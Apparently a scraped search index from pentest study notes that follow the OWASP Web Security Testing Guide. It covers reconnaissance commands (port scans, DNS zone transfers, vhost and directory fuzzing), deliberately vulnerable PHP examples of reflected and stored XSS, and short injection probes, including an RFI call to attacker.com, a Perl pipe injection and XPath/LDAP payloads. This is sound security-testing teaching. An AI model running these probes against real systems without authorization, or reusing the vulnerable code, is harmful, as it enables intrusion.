                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#more-tools","title":"More tools","text":"Tool + Cheat sheet URL dirb DIRB is a web content fingerprinting tool. It scans the web server for directories using a dictionary file feroxbuster FEROXBUSTER is a web content fingerprintinf tool that uses brute force combined with a wordlist to search for unlinked content in target directories. httprint HTTPRINT is a web server fingerprinting tool. It identifies web servers and detects web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. wpscan WPSCAN is a wordpress security scanner.","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#2-non-standard-ports","title":"2. Non standard ports","text":"

                            https://example.com:1234/ and https://example.com:8088/

                            nmap -Pn -sT -p0-65535 $ip\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#3-virtual-hosts","title":"3. Virtual hosts","text":"

                            https://example.com/ and https://webmail.example.com/

                            A virtual host (vHost) is a feature that allows several websites to be hosted on a single server.

                            There are two ways to configure virtual hosts:

                            • IP-based virtual hosting
                            • Name-based virtual hosting: The distinction for which domain the service was requested is made at the application level. For example, several domain names, such as admin.inlanefreight.htb and backup.inlanefreight.htb, can refer to the same IP. Internally on the server, these are separated and distinguished using different folders.
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#identify-name-server","title":"Identify name server","text":"
                            host -t ns example.com\n

                            Request a zone transfer for example.com from one of its nameservers:

                            host -l example.com ns1.example.com\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#dns-enumeration","title":"DNS enumeration","text":"

                            More about DNS enumeration.

                            gobuster (More complete cheat sheet: gobuster)

                            gobuster dns -d <DOMAIN (without http)> -w /usr/share/SecLists/Discovery/DNS/namelist.txt\n

                            Bash script, using Sec wordlist:

                            for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n

                            dig (More complete cheat sheet: dig)

                            # Get email of administrator of the domain\ndig soa www.example.com\n# The email will contain a (.) dot notation instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# -ns: other name servers are known in NS record\n#  `@` character specifies the DNS server we want to query.\n\n# View all available records\ndig any example.com @$ip\n\n# Display version. query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind $ip\n

                            nslookup (More complete cheat sheet: nslookup)

                            # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n

                            DNScan (More complete cheat sheet: DNScan): Python wordlist-based DNS subdomain scanner. The script will first try to perform a zone transfer using each of the target domain's nameservers.

                            dnscan.py (-d \\<domain\\> | -l \\<list\\>) [OPTIONS]\n# Mandatory Arguments\n#    -d  --domain                              Target domain; OR\n#    -l  --list                                Newline separated file of domains to scan\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#vhost-enumeration","title":"VHOST enumeration","text":"

                            vHost Fuzzing

                            # use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\ncat ./vhosts | while read vhost;do echo \"\\n********\\nFUZZING: ${vhost}\\n********\";curl -s -I http://$ip -H \"HOST: ${vhost}.example.com\" | grep \"Content-Length: \";done\n

                            vHost Fuzzing with ffuf:

                            # Virtual Host enumeration\n# use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\nffuf -w ./vhosts -u http://$ip -H \"HOST: FUZZ.example.com\" -fs 612\n# `-w`: Path to our wordlist\n# `-u`: URL we want to fuzz\n# `-H \"HOST: FUZZ.randomtarget.com\"`: This is the `HOST` Header, and the word `FUZZ` will be used as the fuzzing point.\n# `-fs 612`: Filter responses with a size of 612, default response size in this case.\n

                            gobuster (More complete cheat sheet: gobuster)

                            gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u <exact target url>\n# vhost : Uses VHOST for brute-forcing\n# -w : Path to the wordlist\n# -u : Specify the URL\n

                            Wfuzz (More complete cheat sheet: Wfuzz:

                            wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H \"Host: FUZZ.nunchucks.htb\" --hl 546\n# -c: Color in output\n# \u2013hc 404: Hide 404 code responses\n# -t 200: Concurrent Threads\n# -u http://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist \n# -H \u201cHost: FUZZ.nunchucks.htb\u201d: Header. Also with \"FUZZ\" we indicate the injection point for payloads\n# \u2013hl 546: Filter out responses with a specific number of lines. In this case, 546\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-05/","title":"Review Webpage content for Information Leakage","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.5. Review Webpage content for Information Leakage

                            ID Link to Hackinglife Link to OWASP Objectives 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage. - Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist.

                            Sensitive information can include (but not limited to): Private API keys, internal IP addresses, debugging information, sensitive routes, or even credentials.

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-http-comments","title":"Review HTTP comments","text":"
                            <!--\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-metatags","title":"Review METAtags","text":"

                            They do not provide a vector attack directly, but allows an attacker to profile an application:

                            <META name=\"Author\" content=\"John Smith\">\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-javascript-comments","title":"Review javascript comments","text":"
                            ```\n

                            And

                            /*\n

                            And the <script> tag.

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-source-map-files","title":"Review Source map files","text":"

                            By adding .map extension to .js files.

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-06/","title":"Identify Application Entry Points","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.6. Identify Application Entry Points

                            ID Link to Hackinglife Link to OWASP Objectives 1.6 WSTG-INFO-06 Identify Application Entry Points - Identify possible entry and injection points through request and response analysis which covers hidden fields, parameters, methods HTTP header analysis","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#workflow","title":"Workflow","text":"","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#requests","title":"Requests","text":"
                            • Identify GET and POST requests.
                            • Identify parameters (hidden and not hidden, encoded and not, encrypted and not) in GET and POST requests.
                            • Identify other methods.
                            • Note additional or custom type headers
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#responses","title":"Responses","text":"
                            • Identify when the \"Set-cookie\" is used, modified, added.
                            • Identify patterns in responses: when you have 200, 302, 400, 403, or 500.
                            • Pay attention to the response header \"Server.\"
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#using-the-attack-surface-detector-plugin","title":"Using the Attack Surface Detector plugin","text":"

                            Download the Attack Surface Detector plugin in BurpSuite from: https://github.com/secdec/attack-surface-detector-cli/releases.

                            Run this command from the Attack Surface Detector plugin:

                            java -jar attack-surface-detector-cli-1.3.5.jar <source-code-path> [flags]\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#enumeration-techniques-for-http-verbs","title":"Enumeration techniques for HTTP verbs","text":"

                            With netcat

                            # Send a OPTIONS message with netcat\nnc victim.target 80\nOPTIONS / HTTP/1.0\n

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#using-kiterunner","title":"Using Kiterunner","text":"

                            kiterunner Cheat sheet.

                            Kiterunner is an excellent tool that was developed and released by Assetnote. Kiterunner is currently the best tool available for discovering API endpoints and resources. While directory brute force tools like Gobuster/Dirbuster/ work to discover URL paths, it typically relies on standard HTTP GET requests. Kiterunner will not only use all HTTP request methods common with APIs (GET, POST, PUT, and DELETE) but also mimic common API path structures. In other words, instead of requesting GET /api/v1/user/create, Kiterunner will try POST /api/v1/user/create, mimicking a more realistic request.

                            1. First, download the dictionaries from the project. In my case I downloaded it to /usr/share/wordlists/kiterunner/:

                            • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
                            • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
                            • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
                            • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz

                            2. Run a quick scan of your target\u2019s URL or IP address like this:

                            kr scan HTTP://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite  \n

                            But. Note that we conducted this scan without any authorization headers, which the target API likely requires.

                            To use a dictionary (and not a kite file):

                            kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt\n

                            If you have many targets, you can save a list of line-separated targets as a text file and use that file as the target.

                            One of the coolest Kiterunner features is the ability to replay requests. Thus, not only will you have an interesting result to investigate, you will also be able to dissect exactly why that request is interesting. In order to replay a request, copy the entire line of content into Kiterunner, paste it using the kb replay option, and include the wordlist you used:

                            kr kb replay \"GET     414 [    183,    7,   8]://192.168.50.35:8888/api/privatisations/count 0cf6841b1e7ac8badc6e237ab300a90ca873d571\" -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

                            Running this will replay the request and provide you with the HTTP response.

                            To run Kiterunner providing an authorization token as it could be \"x-access-token\", we can take the full authorization token and add it to your Kiterunner scan with the -H option:

                            kr scan http://IP -w /path/to/dict.txt -H 'x-access-token: eyJhGcwisdfdsfdfsdfsdfsdfdsfdsfddfdf.eyfakefakefakefaketokenfakeken._wcoooooo_kkkkkk_kkkk'\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-07/","title":"Map Execution Paths through applications","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.7. Map Execution Paths through applications

                            ID Link to Hackinglife Link to OWASP Objectives 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough

                            Map the target application and understand the principal workflows (paths, data flow and race conditions.)

                            You may use authomatic spidering tools such as Zed Attack Proxy (ZAP).

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#spidering","title":"Spidering","text":"","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#httrack","title":"HTTRack","text":"

                            HTTRack tutorial

                            Create a folder for replicating in it your target.

                            mkdir targetsite\nhttrack domain.com  targetsite/\n

                            Interactive mode:

                            httrack\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#eyewitness","title":"EyeWitness","text":"

                            EyeWitness tutorial

                            First, create a file with the target domains, like for instance, listOfdomains.txt.

                            Then, run:

                            eyewitness --web -f listOfdomains.txt -d path/to/save/\n

                            After that you will get a report.html file with the request and a screenshot of those domains.

                            # Proxing the request via BurpSuite\neyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#directoryfile-enumeration","title":"Directory/File enumeration","text":"","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#nmap","title":"nmap","text":"
                            nmap -sV -p80 --script=http-enum <target>\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#dirb","title":"dirb","text":"

                            Cheat sheet with dirb.

                            dirb http://domain.com /usr/share/metasploit-framework/data/wordlists/directory.txt\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#gobuster","title":"gobuster","text":"

                            Gobuster:

                            gobuster dir -u <exact target url> -w </path/dic.txt> -b 403,4.4 -x .php,.txt -r \n# -b: exclude from results an specific http response`\n# -r: follow redirects\n# -x: add to the path provided by dictionary these extensions\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#ffuf","title":"Ffuf","text":"

                            Ffuf:

                            ffuf -w /path/to/wordlist -u https://target/FUZZ\n\n# Assuming that the default virtualhost response size is 4242 bytes, we can filter out all the responses of that size (`-fs 4242`)while fuzzing the Host - header:\nffuf -w /path/to/vhost/wordlist -u https://target -H \"Host: FUZZ\" -fs 4242\n\n# Enumerating directories and folders:\nffuf -recursion -recursion-depth 1 -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt\n# -recursion: activates the recursive scan\n# -recursion-depth 1: specifies the maximum depth to scan\n\n# fuzz a combination of folder names, with a wordlist of possible files and a dictionary of extensions\nffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://$ip/FOLDERS/WORDLISTEXTENSIONS\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#wfuzz","title":"Wfuzz","text":"

                            Wfuzz

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#feroxbuster","title":"feroxbuster","text":"

                            feroxbuster

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-08/","title":"Fingerprint Web Application Framework","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.8. Fingerprint Web Application Framework

                            ID Link to Hackinglife Link to OWASP Objectives 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. - Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message.","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-08/#http-headers","title":"HTTP headers","text":"
                            • Note the response header X-Powered-By, or X-Generator as well.
                            • Identify framework specific cookies. For instance, the cookie CAKEPHP for php.
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-08/#html-source-code","title":"HTML source code","text":"
                            • Framework is often include in the META tag.
                            • Revise header and footer sections carefully: general markers and specific markers.
                            • See typical file and folders structure. An example would be wp-includes folder for a wordpress installation, or a CHANGELOG file for a Drupal one.
                            • Check out file extensions, as sometimes they reveals the underlying framework.
                            • Revise error messages. They commonly reveals framework.

                            See WSTG-INFO-07 for a reference to HTTRack for mirrowing the code and EyeWitness. These utilities replicated the source code of the target domain.

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-08/#tools","title":"Tools","text":"

                            1. HTTP headers:

                            X-Powered-By and cookies: - .NET: ASPSESSIONID<RANDOM>=<COOKIE_VALUE> - PHP: PHPSESSID=<COOKIE_VALUE> - JAVA: JSESSION=<COOKIE_VALUE>

                            2. whatweb.

                            whatweb -a3 https://www.example.com -v\n# -a3: aggression level 3\n# -v: verbose mode\n

                            3. Wappalyzer: https://www.wappalyzer.com.

                            4. wafw00f:

                            wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n

                            5. Aquatone

                            cat example_of_list.txt | aquatone -out ./aquatone -screenshot-timeout 1000\n

                            6. Addons for browsers:

                            • BuiltWith: BuiltWith\u00ae covers 93,551+ internet technologies which include analytics, advertising, hosting, CMS and many more.

                            7. Curl:

                            curl -IL https://<TARGET>\n# -I: --head (HTTP  FTP  FILE) Fetch the headers only!\n# -L, --location: (HTTP) If the server reports that the requested page has moved to a different location (indicated with a Location: header and a 3XX response  code),  this  option  will make  curl  redo the request on the new place. If used together with -i, --include or -I, --head, headers from all requested pages will be shown. \n

                            8. nmap:

                            sudo nmap -v $ip --script banner.nse\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-09/","title":"Fingerprint Web Applications","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.9. Fingerprint Web Applications

                            ID Link to Hackinglife Link to OWASP Objectives 1.9 WSTG-INFO-09 Fingerprint Web Application N/A, This content has been merged into: WSTG-INFO-08

                            This content has been merged to Fingerprint Web Application Frameworks.

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-09"]},{"location":"OWASP/WSTG-INFO-10/","title":"Map Application architecture","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.10. Map Application architecture

                            ID Link to Hackinglife Link to OWASP Objectives 1.10 WSTG-INFO-10 Map Application Architecture - Understand the architecture of the application and the technologies in use. - Identify application architecture whether on Application and Network components: Applicaton: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs , Network and Security: Reverse proxy, IPS, WAF
                            • In a blind testing, start with the assumption that there is a simple setup (a single server.)
                            • Then, question if there is a firewall protecting the web server.
                            • Is it a stateful firewall or is it an access list filter on a router? Is it bypasseable?
                            • See response headers and try to identify a typical firewall response header.
                            • Reverse proxies might be in use, and configured as Intrusion Prevention System.
                            • Application- level firewall might be in use.
                            • Proxy-caches can be in use.
                            • Is there a Load Balancer in place? F5 BIG-IP load balancers introduces some prefixed cookies.
                            • Some application web servers include values in the response or rewrite URLS automatically to do session tracking.
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-10"]},{"location":"OWASP/WSTG-INPV-01/","title":"Testing for Reflected Cross Site Scripting","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.1. Testing for Reflected Cross Site Scripting

                            ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any).

                            Reflected\u00a0Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. When a web application is vulnerable to this type of attack, it will pass unvalidated input sent through requests back to the client.

                            XSS Filter Evasion Cheat Sheet

                            ","tags":["web pentesting","WSTG-INPV-01"]},{"location":"OWASP/WSTG-INPV-01/#causes","title":"Causes","text":"

                            This vulnerable PHP code in a welcome page may lead to an XSS attack:

                            <?php $name = @$_GET['name']; ?>\n\nWelcome <?=$name?>\n
                            ","tags":["web pentesting","WSTG-INPV-01"]},{"location":"OWASP/WSTG-INPV-01/#attack-techniques","title":"Attack techniques","text":"

                            Go to my XSS cheat sheet

                            ","tags":["web pentesting","WSTG-INPV-01"]},{"location":"OWASP/WSTG-INPV-02/","title":"Testing for Stored Cross Site Scripting","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

                            ID Link to Hackinglife Link to OWASP Description 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any).

                            Stored cross-site scripting is a vulnerability where an attacker is able to inject Javascript code into a web application\u2019s database or source code via an input that is not sanitized. For example, if an attacker is able to inject a malicious XSS payload in to a webpage on a website without proper sanitization, the XSS payload injected in to the webpage will be executed by the browser of anyone that visits that webpage.

                            ","tags":["web pentesting","WSTG-INPV-02"]},{"location":"OWASP/WSTG-INPV-02/#causes","title":"Causes","text":"

                            This vulnerable PHP code in a welcome page may lead to a stored XSS attack:

                            <?php \n$file  = 'newcomers.log';\nif(@$_GET['name']){\n    $current = file_get_contents($file);\n    $current .= $_GET['name'].\"\\n\";\n    //store the newcomer\n    file_put_contents($file, $current);\n}\n//If admin show newcomers\nif(@$_GET['admin']==1)\n    echo file_get_contents($file);\n?>\n\nWelcome <?=$name?>\n
                            ","tags":["web pentesting","WSTG-INPV-02"]},{"location":"OWASP/WSTG-INPV-02/#attack-techniques","title":"Attack techniques","text":"

                            Go to my XSS cheat sheet

                            ","tags":["web pentesting","WSTG-INPV-02"]},{"location":"OWASP/WSTG-INPV-03/","title":"Testing for HTTP Verb Tampering","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.3. Testing for HTTP Verb Tampering

                            ID Link to Hackinglife Link to OWASP Description 7.3 WSTG-INPV-03 Testing for HTTP Verb Tampering N/A, This content has been merged into: WSTG-CONF-06

                            This content has been merged into:\u00a0Test HTTP Methods

                            ","tags":["web pentesting","WSTG-INPV-03"]},{"location":"OWASP/WSTG-INPV-04/","title":"Testing for HTTP Parameter Pollution","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.4. Testing for HTTP Parameter Pollution

                            ID Link to Hackinglife Link to OWASP Description 7.4 WSTG-INPV-04 Testing for HTTP Parameter Pollution - Identify the backend and the parsing method used. - Assess injection points and try bypassing input filters using HPP.","tags":["web pentesting","WSTG-INPV-04"]},{"location":"OWASP/WSTG-INPV-05/","title":"Testing for SQL Injection","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.5. Testing for SQL Injection

                            ID Link to Hackinglife Link to OWASP Description 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it.

                            SQL injection testing checks if it is possible to inject data into an application/site so that it executes a user-controlled SQL query in the database. Testers find a SQL injection vulnerability if the application uses user input to create SQL queries without proper input validation.

                            ","tags":["web pentesting","WSTG-INPV-05"]},{"location":"OWASP/WSTG-INPV-05/#see-my-notes","title":"See my notes","text":"
                            • SQL injection: What is it. How this attack works. Attack classification. Types of databases. Payloads. Dictionaries.
                            • NoSQL injection: What is it. Typical payloads.
                            • Manual attack.
                            ","tags":["web pentesting","WSTG-INPV-05"]},{"location":"OWASP/WSTG-INPV-06/","title":"Testing for LDAP Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.6. Testing for LDAP Injection

                            ID Link to Hackinglife Link to OWASP Description 7.6 WSTG-INPV-06 Testing for LDAP Injection - Identify LDAP injection points: /ldapsearch?user= user=user=)(uid=))(|(uid=* pass=password - Assess the severity of the injection:","tags":["web pentesting","WSTG-INPV-06"]},{"location":"OWASP/WSTG-INPV-07/","title":"Testing for XML Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.7. Testing for XML Injection

                            ID Link to Hackinglife Link to OWASP Description 7.7 WSTG-INPV-07 Testing for XML Injection - Identify XML injection points with XML Meta Characters: ', \" , <>, , &, <![CDATA[ / ]]>, XXE, TAG - Assess the types of exploits that can be attained and their severities.","tags":["web pentesting","WSTG-INPV-07"]},{"location":"OWASP/WSTG-INPV-08/","title":"Testing for SSI Injection","text":"OWASP
                            [OWASP Web Security Testing Guide 4.2](index.md) > 7. Data Validation Testing > 7.8. Testing for SSI Injection\n
                            ID Link to Hackinglife Link to OWASP Description 7.8 WSTG-INPV-08 Testing for SSI Injection - Identify SSI injection points (Presense of .shtml extension) with these characters: < ! # = / . \" - > and [a-zA-Z0-9] - Assess the severity of the injection.","tags":["web pentesting","WSTG-INPV-08"]},{"location":"OWASP/WSTG-INPV-08/#server-side-includes-ssi-injection","title":"Server-Side Includes (SSI) Injection","text":"

                            SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user.

                            SSI can lead to a Remote Command Execution (RCE), however most webservers have the exec directive disabled by default.

                            ","tags":["web pentesting","WSTG-INPV-08"]},{"location":"OWASP/WSTG-INPV-09/","title":"Testing for XPath Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.9. Testing for XPath Injection

                            ID Link to Hackinglife Link to OWASP Description 7.9 WSTG-INPV-09 Testing for XPath Injection - Identify XPATH injection points by checking for XML error enumeration by supplying a single quote ('): Username: \u2018 or \u20181\u2019 = \u20181 Password: \u2018 or \u20181\u2019 = \u20181","tags":["web pentesting","WSTG-INPV-09"]},{"location":"OWASP/WSTG-INPV-10/","title":"Testing for IMAP SMTP Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.10. Testing for IMAP SMTP Injection

                            ID Link to Hackinglife Link to OWASP Description 7.10 WSTG-INPV-10 Testing for IMAP SMTP Injection - Identify IMAP/SMTP injection points (Header, Body, Footer) with special characters (i.e.: \\, \u2018, \u201c, @, #, !, |) - Understand the data flow and deployment structure of the system. - Assess the injection impacts.","tags":["web pentesting","WSTG-INPV-10"]},{"location":"OWASP/WSTG-INPV-11/","title":"Testing for Code Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.11. Testing for Code Injection

                            ID Link to Hackinglife Link to OWASP Description 7.11 WSTG-INPV-11 Testing for Code Injection - Identify injection points where you can inject code into the application. - Check LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource). - Check RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page - Assess the injection severity.","tags":["web pentesting","WSTG-INPV-11"]},{"location":"OWASP/WSTG-INPV-11/#local-file-inclusion","title":"Local File Inclusion","text":"

                            See my notes on Local File Inclusion

                            ","tags":["web pentesting","WSTG-INPV-11"]},{"location":"OWASP/WSTG-INPV-12/","title":"Testing for command injection","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.12. Testing for Command Injection

                            ID Link to Hackinglife Link to OWASP Description 7.12 WSTG-INPV-12 Testing for Command Injection - Identify and assess the command injection points with special characters (i.e.: | ; & $ > < ' !) For example: ?doc=Doc1.pdf+|+Dir c:|

                            Command injection vulnerabilities in the context of web application penetration testing occur when an attacker can manipulate the input fields of a web application in a way that allows them to execute arbitrary operating system commands on the underlying server. This type of vulnerability is a serious security risk because it can lead to unauthorized access, data theft, and full compromise of the web server.

                            Causes:

                            • User Input Handling: Web applications often take user input through forms, query parameters, or other means.
                            • Lack of Input Sanitization: Insecurely coded applications may fail to properly validate, sanitize, or escape user inputs before using them in system commands.
                            • Injection Points: Attackers identify injection points, such as input fields or URL query parameters, where they can insert malicious commands.

                            Impact:

                            • Unauthorized Execution: Attackers can execute arbitrary commands with the privileges of the web server process. This can lead to unauthorized data access, code execution, or system compromise.
                            • Data Exfiltration: Attackers can exfiltrate sensitive data, such as database content, files, or system configurations.
                            • System Manipulation: Attackers may manipulate the server, installmalware, or create backdoors for future access.
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#how-to-test","title":"How to Test","text":"

                            Malicious Input: Attackers craft input that includes special characters, like semicolons, pipes, backticks, and other shell metacharacters, to break out of the intended input context and inject their commands. Command Execution: When the application processes the attacker's input, it constructs a shell command using the malicious input. The server, believing the command to be legitimate, executes it in the underlying operating system

                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#case-study-perl","title":"Case Study: Perl","text":"

                            When viewing a file in a web application, the filename is often shown in the URL. Perl allows piping data from a process into an open statement. The user can simply append the Pipe symbol | onto the end of the filename.

                            # Example URL before alteration\nhttp://sensitive/cgi-bin/userData.pl?doc=user1.txt \n\n# Example URL modified\nhttp://sensitive/cgi-bin/userData.pl?doc=/bin/ls|\n
                            ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#php-code-injection","title":"PHP code injection","text":"

                            PHP code injection vulnerabilities, also known as PHP code execution vulnerabilities, occur when an attacker can inject and execute arbitrary PHP code within a web application. These vulnerabilities are a serious security concern because they allow attackers to gain unauthorized access to the server, execute malicious actions, and potentially compromise the entire web application.

                            Malicious Input: Attackers craft input that includes PHP code snippets, often enclosed within PHP tags (<?php ... ?>) or backticks (`).

                            Code Execution: When the application processes the attacker's input, it includes the injected PHP code as part of a PHP script that is executed on the server.

                            This allows the attacker to run arbitrary PHP code in the context of the web application.

                            Command injection: Appending a semicolon to the end of a URL for a .PHP page followed by an operating system command, will execute the command. %3B is URL encoded and decodes to semicolon

